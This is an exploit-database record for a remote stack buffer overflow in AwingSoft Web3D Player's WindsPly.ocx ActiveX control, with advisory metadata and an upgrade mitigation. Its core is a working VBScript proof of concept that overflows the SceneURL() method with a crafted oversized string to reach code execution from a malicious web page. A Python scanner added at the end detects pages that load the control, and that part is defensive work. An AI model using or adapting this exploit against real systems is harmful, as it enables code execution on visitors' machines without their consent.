Vendor: Web3D Player (WindsPly.ocx)
By: shinnai
CVSS: 9.3 (HIGH)
Type: Buffer Overflow
CWE: 119
Product Name: Web3D Player (WindsPly.ocx)
Affected Version From: <= 3.5.0.0
Affected Version To: <= 3.5.0.0
Patch Exists: Yes
Related CWE: N/A
CPE: 17A54E7D-A9D4-11D8-9552-00E04CB09903
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP3
Year: 2009

AwingSoft Web3D Player (WindsPly.ocx) “SceneURL()” Remote Buffer Overflow

AwingSoft Web3D Player (WindsPly.ocx) is vulnerable to a remote stack-based buffer overflow caused by a boundary error in the processing of the SceneURL() method. Passing an overly long string to SceneURL() overflows the buffer, and this can be exploited to execute arbitrary code by tricking a user into visiting a malicious web page.

Mitigation:

Upgrade to the latest version of AwingSoft Web3D Player (WindsPly.ocx)

Exploit-DB raw data:

-----------------------------------------------------------------------------
 AwingSoft Web3D Player (WindsPly.ocx) "SceneURL()" Remote Buffer Overflow
 url: http://www.awingsoft.com/

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.net/

 Dedicated to aaannamariaaa :D

 This was written for educational purposes. Use it at your own risk.
 The author will not be responsible for any damage.

 File: WindsPly.ocx
 Ver.: <= 3.5.0.0
 GUID: {17A54E7D-A9D4-11D8-9552-00E04CB09903}
 ProgID: WindsPlayerIE.View.1

 Marked as:
 RegKey Safe for Script: Falso
 RegKey Safe for Init: Falso
 Implements IObjectSafety: Vero
 IDisp Safe: Safe for untrusted: caller,data
 IPersist Safe: Safe for untrusted: caller,data
 IPStorage Safe: Safe for untrusted: caller,data

 Tested on Windows XP Professional SP3 all patched, with Internet Explorer 8
-----------------------------------------------------------------------------
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903' id='test'></object>

<script language='vbscript'>
  buff = String(8704, "A")
  mReg = unescape("bbbb")
  mExc = unescape("%00%00%01%00") 'Memory address: 00010000 Access: RW
  buf1 = String(88, "c")
  buf2 = String(47284, "D")

  test.SceneURL = buff + mReg + mExc + buf1 + buf2
</script>

# milw0rm.com [2009-07-10]
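
Added example (not part of the original advisory or any vendor code): a Python scanner that a web proxy or mail gateway could run to flag HTML instantiating this control, keyed on the CLSID and ProgID listed in the advisory header. The names `ControlFinder` and `scan_html` and the sample markup are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Identifiers copied from the advisory header above.
CLSID = "17A54E7D-A9D4-11D8-9552-00E04CB09903"
PROGID = "WindsPlayerIE.View.1"

# Script-side instantiation by ProgID, e.g. CreateObject("...") or new ActiveXObject("...").
PROGID_RE = re.compile(
    r"(?:CreateObject|ActiveXObject)\s*\(\s*['\"]" + re.escape(PROGID) + r"['\"]",
    re.IGNORECASE)

class ControlFinder(HTMLParser):
    """Records every place a page instantiates the WindsPly.ocx control."""
    def __init__(self):
        super().__init__()
        self.findings = []          # (line, kind, detail)
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        elif tag == "object":
            a = {k: (v or "") for k, v in attrs}
            # classid is "clsid:<GUID>"; case, braces and padding vary in real markup.
            classid = a.get("classid", "").strip().lower()
            if classid.startswith("clsid:") and classid[6:].strip("{} ") == CLSID.lower():
                self.findings.append((self.getpos()[0], "object-classid", a.get("id", "")))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and PROGID_RE.search(data):
            self.findings.append((self.getpos()[0], "progid-instantiation", PROGID))

def scan_html(text):
    finder = ControlFinder()
    finder.feed(text)
    finder.close()
    return finder.findings

# Constructed sample page: no payload, only the instantiation patterns to detect.
SAMPLE = """<html><body>
<OBJECT ClassID="CLSID:{17a54e7d-a9d4-11d8-9552-00e04cb09903}" id="viewer"></OBJECT>
<script language="vbscript">Set v = CreateObject("windsplayerie.view.1")</script>
<object classid="clsid:00000000-0000-0000-0000-000000000001" id="other"></object>
</body></html>"""
```

Each finding carries the line where the tag or script block starts, so a hit can be traced back to the offending markup.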